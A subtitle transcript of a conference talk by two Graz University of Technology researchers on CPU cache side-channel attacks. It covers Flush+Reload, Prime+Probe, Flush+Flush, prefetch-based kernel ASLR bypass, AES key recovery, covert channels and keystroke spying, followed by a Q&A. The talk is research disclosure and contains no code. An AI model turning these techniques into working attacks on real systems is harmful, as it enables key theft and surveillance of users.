Music Herald Angel: We are here with a motto, and the motto of this year is "Works For Me" and I think, who many people, how many people in here are programmmers? Raise your hands or shout or... Whoa, that's a lot. Okay. So I think many of you will work on x86. Yeah. And I think you assume that it works, and that everything works as intended And I mean: What could go wrong? Our next talk, the first one today, will be by Clémentine Maurice, who previously was here with RowhammerJS, something I would call scary, and Moritz Lipp, who has worked on the Armageddon exploit, back, what is it? Okay, so the next... I would like to hear a really warm applause for the speakers for the talk "What could what could possibly go wrong with insert x86 instruction here?" thank you. Applause Clémentine Maurice (CM): Well, thank you all for being here this morning. Yes, this is our talk "What could possibly go wrong with insert x86 instructions here". So just a few words about ourselves: So I'm Clémentine Maurice, I got my PhD last year in computer science and I'm now working as a postdoc at Graz University of Technology in Austria. You can reach me on Twitter or by email but there's also I think a lots of time before the Congress is over. Moritz Lipp (ML): Hi and my name is Moritz Lipp, I'm a PhD student at Graz University of Technology and you can also reach me on Twitter or just after our talk and in the next days. CM: So, about this talk: So, the title says this is a talk about x86 instructions, but this is not a talk about software. Don't leave yet! I'm actually even assuming safe software and the point that we want to make is that safe software does not mean safe execution and we have information leakage because of the underlying hardware and this is what we're going to talk about today. So we'll be talking about cache attacks, what are they, what can we do with that and also a special kind of cache attack that we found this year. So... doing cache attacks without memory accesses and how to use that even to bypass kernel ASLR. So again, the talk says is to talk about x86 instructions but this is even more global than that. We can also mount these cache attacks on ARM and not only on the x86. So some of the examples that you will see also applies to ARM. So today we'll do have a bit of background, but actually most of the background will be along the lines because this covers really a huge chunk of our research, and we'll see mainly three instructions: So "mov" and how we can perform these cache attacks, what are they... The instruction "clflush", so here we'll be doing cache attacks without any memory accesses. Then we'll see "prefetch" and how we can bypass kernel ASLR and lots of translations levels, and then there's even a bonus track, so it's this this will be not our works, but even more instructions and even more text. Okay, so let's start with a bit of an introduction. So we will be mainly focusing on Intel CPUs, and this is roughly in terms of cores and caches, how it looks like today. So we have different levels of cores ...uh... different cores so here four cores, and different levels of caches. So here usually we have three levels of caches. We have level 1 and level 2 that are private to each call, which means that core 0 can only access its level 1 and its level 2 and not level 1 and level 2 of, for example, core 3, and we have the last level cache... so here if you can see the pointer... So this one is divided in slices so we have as many slices as cores, so here 4 slices, but all the slices are shared across core so core 0 can access the whole last level cache, that's 0 1 2 & 3. We also have a nice property on Intel CPUs is that this level of cache is inclusive, and what it means is that everything that is contained in level 1 and level 2 will also be contained in the last level cache, and this will prove to be quite useful for cache attacks. So today we mostly have set associative caches. What it means is that we have data that is loaded in specific sets and that depends only on its address. So we have some bits of the address that gives us the index and that says "Ok the line is going to be loaded in this cache set", so this is a cache set. Then we have several ways per set so here we have 4 ways and the cacheine is going to be loaded in a specific way and that will only depend on the replacement policy and not on the address itself, so when you load a line into the cache, usually the cache is already full and you have to make room for a new line. So this is where the replacement replacement policy—this is what it does—it says ok I'm going to remove this line to make room for the next line. So for today we're going to see only three instruction as I've been telling you. So the move instruction, it does a lot of things but the only aspect that we're interested in about it that can access data in the main memory. We're going to see a clflush what it does is that it removes a cache line from the cache, from the whole cache. And we're going to see prefetch, it prefetches a cache line for future use. So we're going to see what they do and the kind of side effects that they have and all the attacks that we can do with them. And that's basically all the example you need for today so even if you're not an expert of x86 don't worry it's not just slides full of assembly and stuff. Okay so on to the first one. ML: So we will first start with the 'mov' instruction and actually the first slide is full of code, however as you can see the mov instruction is used to move data from registers to registers, from the main memory and back to the main memory and as you can see there are many moves you can use but basically it's just to move data and that's all we need to know. In addition, a lot of exceptions can occur so we can assume that those restrictions are so tight that nothing can go wrong when you just move data because moving data is simple. However while there are a lot of exceptions the data that is accessed is always loaded into the cache, so data is in the cache and this is transparent to the program that is running. However, there are side-effects when you run these instructions, and we will see how they look like with the mov instruction. So you probably all know that data can either be in CPU registers, in the different levels of the cache that Clementine showed to you earlier, in the main memory, or on the disk, and depending on where the memory and the data is located it needs a longer time to be loaded back to the CPU, and this is what we can see in this plot. So we try here to measure the access time of an address over and over again, assuming that when we access it more often, it is already stored in the cache. So around 70 cycles, most of the time we can assume when we load an address and it takes 70 cycles, it's loaded into the cache. However, when we assume that the data is loaded from the main memory, we can clearly see that it needs a much longer time like a bit more than 200 cycles. So depending when we measure the time it takes to load the address we can say the data has been loaded to the cache or the data is still located in the main memory. And this property is what we can exploit using cache attacks. So we measure the timing differences on memory accesses. And what an attacker does he monitors the cache lines, but he has no way to know what's actually the content of the cache line. So we can only monitor that this cache line has been accessed and not what's actually stored in the cache line. And what you can do with this is you can implement covert channels, so you can allow two processes to communicate with each other evading the permission system what we will see later on. In addition you can also do side channel attacks, so you can spy with a malicious attacking application on benign processes, and you can use this to steal cryptographic keys or to spy on keystrokes. And basically we have different types of cache attacks and I want to explain the most popular one, the "Flush+Reload" attack, in the beginning. So on the left, you have the address space of the victim, and on the right you have the address space of the attacker who maps a shared library—an executable—that the victim is using in to its own address space, like the red rectangle. And this means that when this data is stored in the cache, it's cached for both processes. Now the attacker can use the flush instruction to remove the data out of the cache, so it's not in the cache anymore, so it's also not cached for the victim. Now the attacker can schedule the victim and if the victim decides "yeah, I need this data", it will be loaded back into the cache. And now the attacker can reload the data, measure the time how long it took, and then decide "okay, the victim has accessed the data in the meantime" or "the victim has not accessed the data in the meantime." And by that you can spy if this address has been used. The second type of attack is called "Prime+Probe" and it does not rely on the shared memory like the "Flush+Reload" attack, and it works as following: Instead of mapping anything into its own address space, the attacker loads a lot of data into one cache line, here, and fills the cache. Now he again schedules the victim and the schedule can access data that maps to the same cache set. So the cache set is used by the attacker and the victim at the same time. Now the attacker can start measuring the access time to the addresses he loaded into the cache before, and when he accesses an address that is still in the cache it's faster so he measures the lower time. And if it's not in the cache anymore it has to be reloaded into the cache so it takes a longer time. He can sum this up and detect if the victim has loaded data into the cache as well. So the first thing we want to show you is what you can do with cache attacks is you can implement a covert channel and this could be happening in the following scenario. You install an app on your phone to view your favorite images you take, to apply some filters, and in the end you don't know that it's malicious because the only permission it requires is to access your images which makes sense. So you can easily install it without any fear. In addition you want to know what the weather is outside, so you install a nice little weather widget, and the only permission it has is to access the internet because it has to load the information from somewhere. So what happens if you're able to implement a covert channel between two these two applications, without any permissions and privileges so they can communicate with each other without using any mechanisms provided by the operating system, so it's hidden. It can happen that now the gallery app can send the image to the internet, it will be uploaded and exposed for everyone. So maybe you don't want to see the cat picture everywhere. While we can do this with those Prime+Probe/ Flush+Reload attacks, we will discuss a covert channel using Prime+Probe. So how can we transmit this data? We need to transmit ones and zeros at some point. So the sender and the receiver agree on one cache set that they both use. The receiver probes the set all the time. When the sender wants to transmit a zero he just does nothing, so the lines of the receiver are in the cache all the time, and he knows "okay, he's sending nothing", so it's a zero. On the other hand if the sender wants to transmit a one, he starts accessing addresses that map to the same cache set so it will take a longer time for the receiver to access its addresses again, and he knows "okay, the sender just sent me a one", and Clementine will show you what you can do with this covert channel. CM: So the really nice thing about Prime+Probe is that it has really low requirements. It doesn't need any kind of shared memory. For example if you have two virtual machines you could have some shared memory via memory deduplication. The thing is that this is highly insecure, so cloud providers like Amazon ec2, they disable that. Now we can still use Prime+Probe because it doesn't need this shared memory. Another problem with cache covert channels is that they are quite noisy. So when you have other applications that are also running on the system, they are all competing for the cache and they might, like, evict some cache lines, especially if it's an application that is very memory intensive. And you also have noise due to the fact that the sender and the receiver might not be scheduled at the same time. So if you have your sender that sends all the things and the receiver is not scheduled then some part of the transmission can get lost. So what we did is we tried to build an error-free covert channel. We took care of all these noise issues by using some error detection to resynchronize the sender and the receiver and then we use some error correction to correct the remaining errors. So we managed to have a completely error- free covert channel even if you have a lot of noise, so let's say another virtual machine also on the machine serving files through a web server, also doing lots of memory-intensive tasks at the same time, and the covert channel stayed completely error-free, and around 40 to 75 kilobytes per second, which is still quite a lot. All of this is between virtual machines on Amazon ec2. And the really neat thing—we wanted to do something with that—and basically we managed to create an SSH connection really over the cache. So they don't have any network between them, but just we are sending the zeros and the ones and we have an SSH connection between them. So you could say that cache covert channels are nothing, but I think it's a real threat. And if you want to have more details about this work in particular, it will be published soon at NDSS. So the second application that we wanted to show you is that we can attack crypto with cache attacks. In particular we are going to show an attack on AES and a special implementation of AES that uses T-Tables. so that's the fast software implementation because it uses some precomputed lookup tables. It's known to be vulnerable to side-channel attacks since 2006 by Osvik et al, and it's a one- round known plaintext attack, so you have p—or plaintext—and k, your secret key. And the AES algorithm, what it does is compute an intermediate state at each round r. And in the first round, the accessed table indices are just p XOR k. Now it's a known plaintext attack, what this means is that if you can recover the accessed table indices you've also managed to recover the key because it's just XOR. So that would be bad, right, if we could recover these accessed table indices. Well we can, with cache attacks! So we did that with Flush+Reload and with Prime+Probe. On the x-axis you have the plaintext byte values and on the y-axis you have the addresses which are essentially the T table entries. So a black cell means that we've monitored the cache line, and we've seen a lot of cache hits. So basically the blacker it is, the more certain we are that the T-Table entry has been accessed. And here it's a toy example, the key is all-zeros, but you would basically just have a different pattern if the key was not all- zeros, and as long as you can see this nice diagonal or a pattern then you have recovered the key. So it's an old attack, 2006, it's been 10 years, everything should be fixed by now, and you see where I'm going: it's not. So on Android the bouncy castle implementation it uses by default the T-table, so that's bad. Also many implementations that you can find online uses pre-computed values, so maybe be wary about this kind of attacks. The last application we wanted to show you is how we can spy on keystrokes. So for that we will use flush and reload because it's a really fine grained attack. We can see very precisely which cache line has been accessed, and a cache line is only 64 bytes so it's really not a lot and we're going to use that to spy on keystrokes and we even have a small demo for you. ML: So what you can see on the screen this is not on Intel x86 it's on a smartphone, on the Galaxy S6, but you can also apply these cache attacks there so that's what we want to emphasize. So on the left you see the screen and on the right we have connected a shell with no privileges and permissions, so it can basically be an app that you install glass bottle falling from the App Store and on the right we are going to start our spy tool, and on the left we just open the messenger app and whenever the user hits any key on the keyboard our spy tool takes care of that and notices that. Also if he presses the spacebar we can also measure that. If the user decides "ok, I want to delete the word" because he changed his mind, we can also register if the user pressed the backspace button, so in the end we can see exactly how long the words were, the user typed into his phone without any permissions and privileges, which is bad. laughs applause ML: so enough about the mov instruction, let's head to clflush. CM: So the clflush instruction: What it does is that it invalidates from every level the cache line that contains the address that you pass to this instruction. So in itself it's kind of bad because it enables the Flush+Reload attacks that we showed earlier, that was just flush, reload, and the flush part is done with clflush. But there's actually more to it, how wonderful. So there's a first timing leakage with it, so we're going to see that the clflush instruction has a different timing depending on whether the data that you that you pass to it is cached or not. So imagine you have a cache line that is on the level 1 by inclu... With the inclusion property it has to be also in the last level cache. Now this is quite convenient and this is also why we have this inclusion property for performance reason on Intel CPUs, if you want to see if a line is present at all in the cache you just have to look in the last level cache. So this is basically what the clflush instruction does. It goes to the last last level cache, sees "ok there's a line, I'm going to flush this one" and then there's something that tells ok the line is also present somewhere else so then it flushes the line in level 1 and/or level 2. So that's slow. Now if you perform clflush on some data that is not cached, basically it does the same, goes to the last level cache, see that there's no line and there can't be any... This data can't be anywhere else in the cache because it would be in the last level cache if it was anywhere, so it does nothing and it stop there. So that's fast. So how exactly fast and slow am I talking about? So it's actually only a very few cycles so we did this experiments on different microarchitecture so Center Bridge, Ivy Bridge, and Haswell and... So it different colors correspond to the different microarchitecture. So first thing that is already... kinda funny is that you can see that you can distinguish the micro architecture quite nicely with this, but the real point is that you have really a different zones. The solids... The solid line is when we performed the measurement on clflush with the line that was already in the cache, and the dashed line is when the line was not in the cache, and in all microarchitectures you can see that we can see a difference: It's only a few cycles, it's a bit noisy, so what could go wrong? Okay, so exploiting these few cycles, we still managed to perform a new cache attacks that we call "Flush+Flush", so I'm going to explain that to you: So basically everything that we could do with "Flush+Reload", we can also do with "Flush+Flush". We can perform cover channels and sidechannel attacks. It's stealthier than previous cache attacks, I'm going to go back on this one, and it's also faster than previous cache attacks. So how does it work exactly? So the principle is a bit similar to "Flush+Reload": So we have the attacker and the victim that have some kind of shared memory, let's say a shared library. It will be shared in the cache The attacker will start by flushing the cache line then let's the victim perform whatever it does, let's say encryption, the victim will load some data into the cache, automatically, and now the attacker wants to know again if the victim accessed this precise cache line and instead of reloading it is going to flush it again. And since we have this timing difference depending on whether the data is in the cache or not, it gives us the same information as if we reloaded it, except it's way faster. So I talked about stealthiness. So the thing is that basically these cache attacks and that also applies to "Rowhammer": They are already stealth in themselves, because there's no antivirus today that can detect them. but some people thought that we could detect them with performance counters because they do a lot of cache misses and cache references that happen when the data is flushed and when you reaccess memory. now what we thought is that yeah but that also not the only program steps to lots of cache misses and cache references so we would like to have a slightly parametric. So these cache attacks they have a very heavy activity on the cache but they're also very particular because there are very short loops of code if you take flush and reload this just flush one line reload the line and then again flush reload that's very short loop and that creates a very low pressure on the instruction therapy which is kind of particular for of cache attacks so what we decided to do is normalizing the cache even so the cache misses and cache references by events that have to do with the instruction TLB and there we could manage to detect cache attacks and Rowhammer without having false positives so the system metric that I'm going to use when I talk about stealthiness so we started by creating a cover channel. First we wanted to have it as fast as possible so we created a protocol to evaluates all the kind of cache attack that we had so flush+flush, flush+reload, and prime+probe and we started with a packet side of 28 doesn't really matter. We measured the capacity of our covert channel and flush+flush is around 500 kB/s whereas Flush+Reload was only 300 kB/s so Flush+Flush is already quite an improvement on the speed. Then we measured the stealth zone at this speed only Flush+Flush was stealth and now the thing is that Flush+Flush and Flush+Reload as you've seen there are some similarities so for a covert channel they also share the same center on it is receivers different and for this one the center was not stealth for both of them anyway if you want a fast covert channel then just try flush+flush that works. Now let's try to make it stealthy completely stealthy because if I have the standard that is not stealth maybe that we give away the whole attack so we said okay maybe if we just slow down all the attacks then there will be less cache hits, cache misses and then maybe all the attacks are actually stealthy why not? So we tried that we slowed down everything so Flush+Reload and Flash+Flash are around 50 kB/s now Prime+Probe is a bit slower because it takes more time to prime and probe anything but still even with this slow down only Flush+Flush has its receiver stealth and we also managed to have the sender stealth now so basically whether you want a fast covert channel or a stealth covert channel Flush+Flush is really great. Now we wanted to also evaluate if it wasn't too noisy to perform some side channel attack so we did these side channels on the AES t-table implementation the attacks that we have shown you earlier, so we computed a lot of encryption that we needed to determine the upper four bits of a key bytes so here the lower the better the attack and Flush + Reload is a bit better so we need only 250 encryptions to recover these bits but Flush+Flush comes quite, comes quite close with 350 and Prime+Probe is actually the most noisy of them all, needs 5... close to 5000 encryptions so we have around the same performance for Flush+Flush and Flush+Reload. Now let's evaluate the stealthiness again. So what we did here is we perform 256 billion encryptions in a synchronous attack so we really had the spy and the victim scattered and we evaluated the stealthiness of them all and here only Flush+Flush again is stealth. And while you can always slow down a covert channel you can't actually slow down a side channel because, in a real-life scenario, you're not going to say "Hey victim, him wait for me a bit, I am trying to do an attack here." That won't work. So there's even more to it but I will need again a bit of background before continuing. So I've shown you the different levels of caches and here I'm going to focus more on the last-level cache. So we have here our four slices so this is the last-level cache and we have some bits of the address here that corresponds to the set, but more importantly, we need to know where in which slice and address is going to be. And that is given, that is given by some bits of the set and the type of the address that are passed into a function that says in which slice the line is going to be. Now the thing is that this hash function is undocumented by Intel. Wouldn't be fun otherwise. So we have this: As many slices as core, an undocumented hash function that maps a physical address to a slice, and while it's actually a bit of a pain for attacks, it has, it was not designed for security originally but for performance, because you want all the access to be evenly distributed in the different slices, for performance reasons. So the hash function basically does, it takes some bits of the physical address and output k bits of slice, so just one bits if you have a two-core machine, two bits if you have a four-core machine and so on. Now let's go back to clflush, see what's the relation with that. So the thing that we noticed is that clflush is actually faster to reach a line on the local slice. So if you have, if you're flushing always one line and you run your program on core zero, core one, core two and core three, you will observe that one core in particular on, when you run the program on one core, the clflush is faster. And so here this is on core one, and you can see that core zero, two, and three it's, it's a bit slower and here we can deduce that, so we run the program on core one and we flush always the same line and we can deduce that the line belong to slice one. And what we can do with that is that we can map physical address to slices. And that's one way to reverse-engineer this addressing function that was not documented. Funnily enough that's not the only way: What I did before that was using the performance counters to reverse-engineer this function, but that's actually a whole other story and if you want more detail on that, there's also an article on that. ML: So the next instruction we want to talk about is the prefetch instruction. And the prefetch instruction is used to tell the CPU: "Okay, please load the data I need later on, into the cache, if you have some time." And in the end there are actually six different prefetch instructions: prefetcht0 to t2 which means: "CPU, please load the data into the first-level cache", or in the last-level cache, whatever you want to use, but we spare you the details because it's not so interesting in the end. However, what's more interesting is when we take a look at the Intel manual and what it says there. So, "Using the PREFETCH instruction is recommended only if data does not fit in the cache." So you can tell the CPU: "Please load data I want to stream into the cache, so it's more performant." "Use of software prefetch should be limited to memory addresses that are managed or owned within the application context." So one might wonder what happens if this address is not managed by myself. Sounds interesting. "Prefetching to addresses that are not mapped to physical pages can experience non-deterministic performance penalty. For example specifying a NULL pointer as an address for prefetch can cause long delays." So we don't want to do that because our program will be slow. So, let's take a look what they mean with non-deterministic performance penalty, because we want to write good software, right? But before that, we have to take a look at a little bit more background information to understand the attacks. So on modern operating systems, every application has its own virtual address space. So at some point, the CPU needs to translate these addresses to the physical addresses actually in the DRAM. And for that we have this very complex-looking data structure. So we have a 48-bit virtual address, and some of those bits mapped to a table, like the PM level 4 table, with 512 entries, so depending on those bits the CPU knows, at which line he has to look. And if there is data there, because the address is mapped, he can proceed and look at the page directory, point the table, and so on for the town. So is everything, is the same for each level until you come to your page table, where you have 4-kilobyte pages. So it's in the end not that complicated, but it's a bit confusing, because you want to know a physical address, so you have to look it up somewhere in the, in the main memory with physical addresses to translate your virtual addresses. And if you have to go through all those levels, it needs a long time, so we can do better than that and that's why Intel introduced additional caches, also for all of those levels. So, if you want to translate an address, you take a look at the ITLB for instructions, and the data TLB for data. If it's there, you can stop, otherwise you go down all those levels and if it's not in any cache you have to look it up in the DRAM. In addition, the address space you have is shared, because you have, on the one hand, the user memory and, on the other hand, you have mapped the kernel for convenience and performance also in the address space. And if your user program wants to access some kernel functionality like reading a file, it will switch to the kernel memory there's a privilege escalation, and then you can read the file, and so on. So, that's it. However, you have drivers in the kernel, and if you know the addresses of those drivers, you can do code-reuse attacks, and as a countermeasure, they introduced address-space layout randomization, also for the kernel. And this means that when you have your program running, the kernel is mapped at one address and if you reboot the machine it's not on the same address anymore but somewhere else. So if there is a way to find out at which address the kernel is loaded, you have circumvented this countermeasure and defeated kernel address space layout randomization. So this would be nice for some attacks. In addition, there's also the kernel direct physical map. And what does this mean? It's implemented on many operating systems like OS X, Linux, also on the Xen hypervisor and BSD, but not on Windows. But what it means is that the complete physical memory is mapped in additionally in the kernel memory at a fixed offset. So, for every page that is mapped in the user space, there's something like a twin page in the kernel memory, which you can't access because it's in the kernel memory. However, we will need it later, because now we go back to prefetch and see what we can do with that. So, prefetch is not a usual instruction, because it just tells the CPU "I might need that data later on. If you have time, load for me," if not, the CPU can ignore it because it's busy with other stuff. So, there's no necessity that this instruction is really executed, but most of the time it is. And a nice, interesting thing is that it generates no faults, so whatever you pass to this instruction, your program won't crash, and it does not check any privileges, so I can also pass an kernel address to it and it won't say "No, stop, you accessed an address that you are not allowed to access, so I crash," it just continues, which is nice. The second interesting thing is that the operand is a virtual address, so every time you execute this instruction, the CPU has to go and check "OK, what physical address does this virtual address correspond to?" So it has to do the lookup with all those tables we've seen earlier, and as you probably have guessed already, the execution time varies also for the prefetch instruction and we will see later on what we can do with that. So, let's get back to the direct physical map. Because we can create an oracle for address translation, so we can find out what physical address belongs to the virtual address. Because nowadays you don't want that the user to know, because you can craft nice rowhammer attacks with that information, and more advanced cache attacks, so you restrict this information to the user. But let's check if we find a way to still get this information. So, as I've told you earlier, if you have a paired page in the user space map, you have the twin page in the kernel space, and if it's cached, its cached for both of them again. So, the attack now works as the following: From the attacker you flush your user space page, so it's not in the cache for the... also for the kernel memory, and then you call prefetch on the address of the kernel, because as I told you, you still can do that because it doesn't create any faults. So, you tell the CPU "Please load me this data into the cache even if I don't have access to this data normally." And if we now measure on our user space page the address again, and we measure a cache hit, because it has been loaded by the CPU into the cache, we know exactly at which position, since we passed the address to the function, this address corresponds to. And because this is at a fixed offset, we can just do a simple subtraction and know the physical address again. So we have a nice way to find physical addresses for virtual addresses. And in practice this looks like this following plot. So, it's pretty simple, because we just do this for every address, and at some point we measure a cache hit. So, there's a huge difference. And exactly at this point we know this physical address corresponds to our virtual address. The second thing is that we can exploit the timing differences it needs for the prefetch instruction. Because, as I told you, when you go down this cache levels, at some point you see "it's here" or "it's not here," so it can abort early. And with that we can know exactly when the prefetch instruction aborted, and know how the pages are mapped into the address space. So, the timing depends on where the translation stops. And using those two properties and those information, we can do the following: On the one hand, we can build variants of cache attacks. So, instead of Flush+Reload, we can do Flush+Prefetch, for instance. We can also use prefetch to mount rowhammer attacks on privileged addresses, because it doesn't do any faults when we pass those addresses, and it works as well. In addition, we can use it to recover the translation levels of a process, which you could do earlier with the page map file, but as I told you it's now privileged, so you don't have access to that, and by doing that you can bypass address space layout randomization. In addition, as I told you, you can translate virtual addresses to physical addresses, which is now also privileged with the page map file, and using that it reenables return to direct exploits, which have been demonstrated last year. On top of that, we can also use this to locate kernel drivers, as I told you. It would be nice if we can circumvent KSLR as well, and I will show you now how this is possible. So, with the first oracle we find out all the pages that are mapped, and for each of those pages, we evict the translation caches, and we can do that by either calling sleep, which schedules another program, or access just a large memory buffer. Then, we perform a syscall to the driver. So, there's code of the driver executed and loaded into the cache, and then we just measure the time prefetch takes on this address. And in the end, the fastest average access time is the driver page. So, we can mount this attack on Windows 10 in less than 12 seconds. So, we can defeat KSLR in less than 12 seconds, which is very nice. And in practice, the measurements looks like the following: So, we have a lot of long measurements, and at some point you have a low one, and you know exactly that this driver region and the address the driver is located. And you can mount those read to direct attacks again. However, that's not everything, because there are more instructions in Intel. CM: Yeah, so, the following is not our work, but we thought that would be interesting, because it's basically more instructions, more attacks, more fun. So there's the RDSEED instruction, and what it does, that is request a random seed to the hardware random number generator. So, the thing is that there is a fixed number of precomputed random bits, and that takes time to regenerate them. So, as everything that takes time, you can create a covert channel with that. There is also FADD and FMUL, which are floating point operations. Here, the running time of this instruction depends on the operands. Some people managed to bypass Firefox's same origin policy with an SVG filter timing attack with that. There's also the JMP instructions. So, in modern CPUs you have branch prediction, and branch target prediction. With that, it's actually been studied a lot, you can create a covert channel. You can do side-channel attacks on crypto. You can also bypass KSLR, and finally, there are TSX instructions, which is an extension for hardware transactional memory support, which has also been used to bypass KSLR. So, in case you're not sure, KSLR is dead. You have lots of different things to read. Okay, so, on the conclusion now. So, as you've seen, it's actually more a problem of CPU design, than really the instruction sets architecture. The thing is that all these issues are really hard to patch. They are all linked to performance optimizations, and we are not getting rid of performance optimization. That's basically a trade-off between performance and security, and performance seems to always win. There has been some propositions to... against cache attacks, to... let's say remove the CLFLUSH instructions. The thing is that all these quick fix won't work, because we always find new ways to do the same thing without these precise instructions and also, we keep finding new instruction that leak information. So, it's really, let's say quite a big topic that we have to fix this. So, thank you very much for your attention. If you have any questions we'd be happy to answer them. applause applause Herald: Okay. Thank you very much again for your talk, and now we will have a Q&A, and we have, I think, about 15 minutes, so you can start lining up behind the microphones. They are in the gangways in the middle. Except, I think that one... oh, no, it's back up, so it will work. And while we wait, I think we will take questions from our signal angel, if there are any. Okay, there aren't any, so... microphone questions. I think, you in front. Microphone: Hi. Can you hear me? Herald: Try again. Microphone: Okay. Can you hear me now? Okay. Yeah, I'd like to know what exactly was your stealthiness metric? Was it that you can't distinguish it from a normal process, or...? CM: So... Herald: Wait a second. We have still Q&A, so could you quiet down a bit? That would be nice. CM: So, the question was about the stealthiness metric. Basically, we use the metric with cache misses and cache references, normalized by the instructions TLB events, and we just found the threshold under which pretty much every benign application was below this, and rowhammer and cache attacks were after that. So we fixed the threshold, basically. H: That microphone. Microphone: Hello. Thanks for your talk. It was great. First question: Did you inform Intel before doing this talk? CM: Nope. Microphone: Okay. The second question: What's your future plans? CM: Sorry? M: What's your future plans? CM: Ah, future plans. Well, what I did, that is interesting, is that we keep finding these more or less by accident, or manually, so having a good idea of what's the attack surface here would be a good thing, and doing that automatically would be even better. M: Great, thanks. H: Okay, the microphone in the back, over there. The guy in white. M: Hi. One question. If you have, like, a demon, that randomly invalidates some cache lines, would that be a better countermeasure than disabling the caches? ML: What was the question? CM: If invalidating cache lines would be better than disabling the whole cache. So, I'm... ML: If you know which cache lines have been accessed by the process, you can invalidate those cache lines before you swap those processes, but it's also a trade-off between performance. Like, you can also, if you switch processes, flush the whole cache, and then it's empty, and then you don't see any activity anymore, but there's also the trade-off of performance with this. M: Okay, maybe a second question. If you, there are some ARM architectures that have random cache line invalidations. Did you try those, if you can see a [unintelligible] channel there. ML: If they're truly random, but probably you just have to make more measurements and more measurements, and then you can average out the noise, and then you can do these attacks again. It's like, with prime and probe, where you need more measurements, because it's much more noisy, so in the end you will just need much more measurements. CM: So, on ARM, it's supposed to be pretty random. At least it's in the manual, but we actually found nice ways to evict cache lines, that we really wanted to evict, so it's not actually that pseudo-random. So, even... let's say, if something is truly random, it might be nice, but then it's also quite complicated to implement. I mean, you probably don't want a random number generator just for the cache. M: Okay. Thanks. H: Okay, and then the three guys here on the microphone in the front. M: My question is about a detail with the keylogger. You could distinguish between space, backspace and alphabet, which is quite interesting. But could you also figure out the specific keys that were pressed, and if so, how? ML: Yeah, that depends on the implementation of the keyboard. But what we did, we used the Android stock keyboard, which is shipped with the Samsung, so it's pre-installed. And if you have a table somewhere in your code, which says "Okay, if you press this exact location or this image, it's an A or it's an B", then you can also do a more sophisticated attack. So, if you find any functions or data in the code, which directly tells you "Okay, this is this character," you can also spy on the actual key characters on the keyboard. M: Thank you. M: Hi. Thank you for your talk. My first question is: What can we actually do now, to mitigate this kind of attack? By, for example switching off TSX or using ECC RAM. CM: So, I think the very important thing to protect would be, like crypto, and the good thing is that today we know how to build crypto that is resistant to side- channel attacks. So the good thing would be to stop improving implementation that are known to be vulnerable for 10 years. Then things like keystrokes is way harder to protect, so let's say crypto is manageable; the whole system is clearly another problem. And you can have different types of countermeasure on the hardware side but it does would mean that Intel an ARM actually want to fix that, and that they know how to fix that. I don't even know how to fix that in hardware. Then on the system side, if you prevent some kind of memory sharing, you don't have flush involved anymore and primum (?) probably is much more noisier, so it would be an improvement. M: Thank you. H: Do we have signal angel questions? No. OK, then more microphone. M: Hi, thank you. I wanted to ask about the way you establish the side-channel between the two processors, because it would obviously have to be timed in a way to transmit information between one process to the other. Is there anywhere that you documented the whole? You know, it's actually almost like the seven layers or something like that. There are any ways that you documented that? It would be really interesting to know how it worked. ML: You can find this information in the paper because there are several papers on covered channels using that, so the NDSS paper is published in February I guess, but the Armageddon paper also includes a cover channel, and you can find more information about how the packets look like and how the synchronization works in the paper. M: Thank you. H: One last question? M: Hi! You mentioned that you used Osvik's attack for the AES side-channel attack. Did you solve the AES round detection and is it different to some scheduler manipulation? CM: So on this one I think we only did some synchronous attack, so we already knew when the victim is going to be scheduled and we didn't have anything to do with schedulers. M: Alright, thank you. H: Are there any more questions? No, I don't see anyone. Then, thank you very much again to our speakers. applause music subtitles created by c3subtitles.de in the year 2020. Join, and help us!